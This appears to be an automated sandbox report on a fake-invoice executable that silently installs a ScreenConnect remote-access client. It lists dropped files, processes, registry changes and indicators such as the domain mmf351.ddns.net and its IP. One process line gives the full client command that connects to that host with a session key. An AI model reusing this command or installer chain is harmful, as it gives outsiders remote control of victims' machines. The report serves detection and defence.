Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
invoice-benefits-agency9-24-2024.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
initial sample
|
 |
|
|
C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
|
|
|
C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe.config
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\invoice-benefits-agency9-24-2024.exe.log
|
ASCII text, with CRLF line terminators
|
dropped
|
|
|
|
C:\Config.Msi\5d26dd.rbs
|
data
|
modified
|
||
|
C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\Client.Override.en-US.resources
|
data
|
dropped
|
||
|
C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\Client.Override.resources
|
data
|
dropped
|
||
|
C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\Client.en-US.resources
|
data
|
dropped
|
||
|
C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\Client.resources
|
data
|
dropped
|
||
|
C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Client.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
|
C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
|
C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Core.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
|
C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Windows.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
|
C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsAuthenticationPackage.dll
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
|
C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsBackstageShell.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
|
C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsBackstageShell.exe.config
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsCredentialProvider.dll
|
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
|
dropped
|
||
|
C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsFileManager.exe
|
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
|
C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsFileManager.exe.config
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\app.config
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\system.config
|
XML 1.0 document, ASCII text, with very long lines (457), with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rundll32.exe.log
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\MSI22D5.tmp
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\MSI22D5.tmp-\CustomAction.config
|
XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\MSI22D5.tmp-\Microsoft.Deployment.Compression.Cab.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\MSI22D5.tmp-\Microsoft.Deployment.Compression.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\MSI22D5.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\MSI22D5.tmp-\Microsoft.Deployment.WindowsInstaller.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\MSI22D5.tmp-\ScreenConnect.Core.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\MSI22D5.tmp-\ScreenConnect.InstallerActions.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\MSI22D5.tmp-\ScreenConnect.Windows.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\ScreenConnect\e6cb77284cf765aa\setup.msi
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation
Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision
Number: {5432CC63-8BF4-F791-1B1A-15E2F80B3217}, Create Time/Date: Tue Aug 13 23:22:20 2024, Last Saved Time/Date: Tue Aug
13 23:22:20 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701),
Security: 2
|
dropped
|
||
|
C:\Windows\Installer\5d26dc.msi
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation
Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision
Number: {5432CC63-8BF4-F791-1B1A-15E2F80B3217}, Create Time/Date: Tue Aug 13 23:22:20 2024, Last Saved Time/Date: Tue Aug
13 23:22:20 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701),
Security: 2
|
dropped
|
||
|
C:\Windows\Installer\5d26de.msi
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, MSI Installer, Code page: 1252, Title: Installation
Database, Subject: Default, Author: ScreenConnect Software, Keywords: Default, Comments: Default, Template: Intel;1033, Revision
Number: {5432CC63-8BF4-F791-1B1A-15E2F80B3217}, Create Time/Date: Tue Aug 13 23:22:20 2024, Last Saved Time/Date: Tue Aug
13 23:22:20 2024, Number of Pages: 200, Number of Words: 2, Name of Creating Application: Windows Installer XML Toolset (3.11.0.1701),
Security: 2
|
dropped
|
||
|
C:\Windows\Installer\MSI299C.tmp
|
data
|
dropped
|
||
|
C:\Windows\Installer\MSI29CB.tmp
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
|
C:\Windows\Installer\MSI2E03.tmp
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
||
|
C:\Windows\Installer\SourceHash{5432CC63-8BF4-F791-1B1A-15E2F80B3217}
|
Composite Document File V2 Document, Cannot read section info
|
dropped
|
||
|
C:\Windows\Installer\inprogressinstallinfo.ipi
|
Composite Document File V2 Document, Cannot read section info
|
dropped
|
||
|
C:\Windows\Installer\{5432CC63-8BF4-F791-1B1A-15E2F80B3217}\DefaultIcon
|
MS Windows icon resource - 3 icons, 16x16 with PNG image data, 16 x 16, 8-bit colormap, non-interlaced, 4 bits/pixel, 32x32
with PNG image data, 32 x 32, 1-bit colormap, non-interlaced, 4 bits/pixel
|
dropped
|
||
|
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log
|
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
|
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (e6cb77284cf765aa)\c3g3oimb.newcfg
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
modified
|
||
|
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (e6cb77284cf765aa)\user.config (copy)
|
XML 1.0 document, ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Windows\Temp\~DF2594B91244C1E482.TMP
|
data
|
dropped
|
||
|
C:\Windows\Temp\~DF3904BCE3863BBB97.TMP
|
Composite Document File V2 Document, Cannot read section info
|
dropped
|
||
|
C:\Windows\Temp\~DF39F8C53BEB930CCC.TMP
|
data
|
dropped
|
||
|
C:\Windows\Temp\~DF55EC491EC37D1E05.TMP
|
Composite Document File V2 Document, Cannot read section info
|
dropped
|
||
|
C:\Windows\Temp\~DF63DAD0F42FAC0526.TMP
|
data
|
dropped
|
||
|
C:\Windows\Temp\~DF83091F900A229C10.TMP
|
Composite Document File V2 Document, Cannot read section info
|
dropped
|
||
|
C:\Windows\Temp\~DF9A0B5BE63C2186DA.TMP
|
data
|
dropped
|
||
|
C:\Windows\Temp\~DF9F6F6213DB829714.TMP
|
data
|
dropped
|
||
|
C:\Windows\Temp\~DFB655C4A6E39729BD.TMP
|
data
|
dropped
|
||
|
C:\Windows\Temp\~DFE9D7EC60AF409F72.TMP
|
Composite Document File V2 Document, Cannot read section info
|
dropped
|
||
|
C:\Windows\Temp\~DFF2459D4AF43A8C44.TMP
|
Composite Document File V2 Document, Cannot read section info
|
dropped
|
||
|
C:\Windows\Temp\~DFFD0291219D99A7E2.TMP
|
data
|
dropped
|
There are 47 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exe
|
"C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exe"
|
|
|
|
C:\Windows\System32\msiexec.exe
|
C:\Windows\system32\msiexec.exe /V
|
|
|
|
C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe
|
"C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=mmf351.ddns.net&p=8041&s=64aa4158-b0dc-4cfb-a3e6-dfec05b77827&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&t=invoice&c=choicebenefitsagency&c=https%3a%2f%2fchoicebenefitsagency.com&c=choicebenefitsagency&c=&c=&c=&c=&c="
|
|
|
|
C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe
|
"C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe" "RunRole" "b39d397f-880b-4274-a788-d5e0ae46124e"
"User"
|
|
|
|
C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe
|
"C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe" "RunRole" "2a312dd1-915e-4a70-b7fc-6da8f9a2cf4a"
"System"
|
|
|
|
C:\Windows\SysWOW64\msiexec.exe
|
"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\e6cb77284cf765aa\setup.msi"
|
||
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\syswow64\MsiExec.exe -Embedding BC344CC8D534C153146082E5C0B08418 C
|
||
|
C:\Windows\SysWOW64\rundll32.exe
|
rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI22D5.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6103906 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
|
||
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\syswow64\MsiExec.exe -Embedding 8260A170A10C2A63DD060DA2E17AE0B9
|
||
|
C:\Windows\SysWOW64\msiexec.exe
|
C:\Windows\syswow64\MsiExec.exe -Embedding EC3C4A72C16F999398D301E804ECE99B E Global\MSI0000
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://wixtoolset.org/releases/
|
unknown
|
||
|
https://choicebenefitsagency.comLR_q
|
unknown
|
||
|
http://wixtoolset.org/news/
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://choicebenefitsagency.com
|
unknown
|
||
|
http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/v
|
unknown
|
||
|
https://feedback.screenconnect.com/Feedback.axd
|
unknown
|
||
|
https://docs.rs/getrandom#nodejs-es-module-support
|
unknown
|
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
mmf351.ddns.net
|
79.110.49.16
|
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
79.110.49.16
|
mmf351.ddns.net
|
Germany
|
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa
|
Authentication Packages
|
|
|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
|
Owner
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
|
SessionHash
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
|
Sequence
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders
|
C:\Config.Msi\
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Rollback\Scripts
|
C:\Config.Msi\5d26dd.rbs
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Rollback\Scripts
|
C:\Config.Msi\5d26dd.rbsLow
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\ECA6CD7F99528C9229C5B5A3CC99D4F1
|
36CC23454FB8197FB1A1512E8FB02371
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\5283F57ED5163C6A818A8A1161EBB1A2
|
36CC23454FB8197FB1A1512E8FB02371
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\B06603D19278B80B5232D336168F335F
|
36CC23454FB8197FB1A1512E8FB02371
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A1F4DF55221E9D239E861E9AB278A4A9
|
36CC23454FB8197FB1A1512E8FB02371
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\9E9DED4CDF5ACF58864B7AC15417DF1D
|
36CC23454FB8197FB1A1512E8FB02371
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\14AA0CD5258905F0D6FD710F28596A13
|
36CC23454FB8197FB1A1512E8FB02371
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\195432AE4E1CE7DEDD30F3C30EC54D0E
|
36CC23454FB8197FB1A1512E8FB02371
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders
|
C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\sc-e6cb77284cf765aa
|
URL Protocol
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\sc-e6cb77284cf765aa
|
UseOriginalUrlEncoding
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\sc-e6cb77284cf765aa\shell\open\command
|
NULL
|
||
|
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\ScreenConnect Client (e6cb77284cf765aa)
|
NULL
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-1B99-D78CA2F0BC1A}
|
NULL
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-1B99-D78CA2F0BC1A}\InprocServer32
|
NULL
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-1B99-D78CA2F0BC1A}\InprocServer32
|
ThreadingModel
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\Credential Providers\{6FF59A85-BC37-4CD4-1B99-D78CA2F0BC1A}
|
NULL
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\36CC23454FB8197FB1A1512E8FB02371\InstallProperties
|
LocalPackage
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\36CC23454FB8197FB1A1512E8FB02371\InstallProperties
|
AuthorizedCDFPrefix
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\36CC23454FB8197FB1A1512E8FB02371\InstallProperties
|
Comments
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\36CC23454FB8197FB1A1512E8FB02371\InstallProperties
|
Contact
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\36CC23454FB8197FB1A1512E8FB02371\InstallProperties
|
DisplayVersion
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\36CC23454FB8197FB1A1512E8FB02371\InstallProperties
|
HelpLink
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\36CC23454FB8197FB1A1512E8FB02371\InstallProperties
|
HelpTelephone
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\36CC23454FB8197FB1A1512E8FB02371\InstallProperties
|
InstallDate
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\36CC23454FB8197FB1A1512E8FB02371\InstallProperties
|
InstallLocation
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\36CC23454FB8197FB1A1512E8FB02371\InstallProperties
|
InstallSource
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\36CC23454FB8197FB1A1512E8FB02371\InstallProperties
|
ModifyPath
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\36CC23454FB8197FB1A1512E8FB02371\InstallProperties
|
NoModify
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\36CC23454FB8197FB1A1512E8FB02371\InstallProperties
|
NoRepair
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\36CC23454FB8197FB1A1512E8FB02371\InstallProperties
|
Publisher
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\36CC23454FB8197FB1A1512E8FB02371\InstallProperties
|
Readme
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\36CC23454FB8197FB1A1512E8FB02371\InstallProperties
|
Size
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\36CC23454FB8197FB1A1512E8FB02371\InstallProperties
|
EstimatedSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\36CC23454FB8197FB1A1512E8FB02371\InstallProperties
|
UninstallString
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\36CC23454FB8197FB1A1512E8FB02371\InstallProperties
|
URLInfoAbout
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\36CC23454FB8197FB1A1512E8FB02371\InstallProperties
|
URLUpdateInfo
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\36CC23454FB8197FB1A1512E8FB02371\InstallProperties
|
VersionMajor
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\36CC23454FB8197FB1A1512E8FB02371\InstallProperties
|
VersionMinor
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\36CC23454FB8197FB1A1512E8FB02371\InstallProperties
|
WindowsInstaller
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\36CC23454FB8197FB1A1512E8FB02371\InstallProperties
|
Version
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\36CC23454FB8197FB1A1512E8FB02371\InstallProperties
|
Language
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5432CC63-8BF4-F791-1B1A-15E2F80B3217}
|
AuthorizedCDFPrefix
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5432CC63-8BF4-F791-1B1A-15E2F80B3217}
|
Comments
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5432CC63-8BF4-F791-1B1A-15E2F80B3217}
|
Contact
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5432CC63-8BF4-F791-1B1A-15E2F80B3217}
|
DisplayVersion
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5432CC63-8BF4-F791-1B1A-15E2F80B3217}
|
HelpLink
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5432CC63-8BF4-F791-1B1A-15E2F80B3217}
|
HelpTelephone
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5432CC63-8BF4-F791-1B1A-15E2F80B3217}
|
InstallDate
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5432CC63-8BF4-F791-1B1A-15E2F80B3217}
|
InstallLocation
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5432CC63-8BF4-F791-1B1A-15E2F80B3217}
|
InstallSource
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5432CC63-8BF4-F791-1B1A-15E2F80B3217}
|
ModifyPath
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5432CC63-8BF4-F791-1B1A-15E2F80B3217}
|
NoModify
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5432CC63-8BF4-F791-1B1A-15E2F80B3217}
|
NoRepair
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5432CC63-8BF4-F791-1B1A-15E2F80B3217}
|
Publisher
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5432CC63-8BF4-F791-1B1A-15E2F80B3217}
|
Readme
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5432CC63-8BF4-F791-1B1A-15E2F80B3217}
|
Size
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5432CC63-8BF4-F791-1B1A-15E2F80B3217}
|
EstimatedSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5432CC63-8BF4-F791-1B1A-15E2F80B3217}
|
UninstallString
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5432CC63-8BF4-F791-1B1A-15E2F80B3217}
|
URLInfoAbout
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5432CC63-8BF4-F791-1B1A-15E2F80B3217}
|
URLUpdateInfo
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5432CC63-8BF4-F791-1B1A-15E2F80B3217}
|
VersionMajor
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5432CC63-8BF4-F791-1B1A-15E2F80B3217}
|
VersionMinor
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5432CC63-8BF4-F791-1B1A-15E2F80B3217}
|
WindowsInstaller
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5432CC63-8BF4-F791-1B1A-15E2F80B3217}
|
Version
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5432CC63-8BF4-F791-1B1A-15E2F80B3217}
|
Language
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UpgradeCodes\C18BA22B6B7B3C7E6EBC7782C47F56AA
|
36CC23454FB8197FB1A1512E8FB02371
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\36CC23454FB8197FB1A1512E8FB02371\InstallProperties
|
DisplayName
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{5432CC63-8BF4-F791-1B1A-15E2F80B3217}
|
DisplayName
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Features\36CC23454FB8197FB1A1512E8FB02371
|
Full
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\36CC23454FB8197FB1A1512E8FB02371\Features
|
Full
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders
|
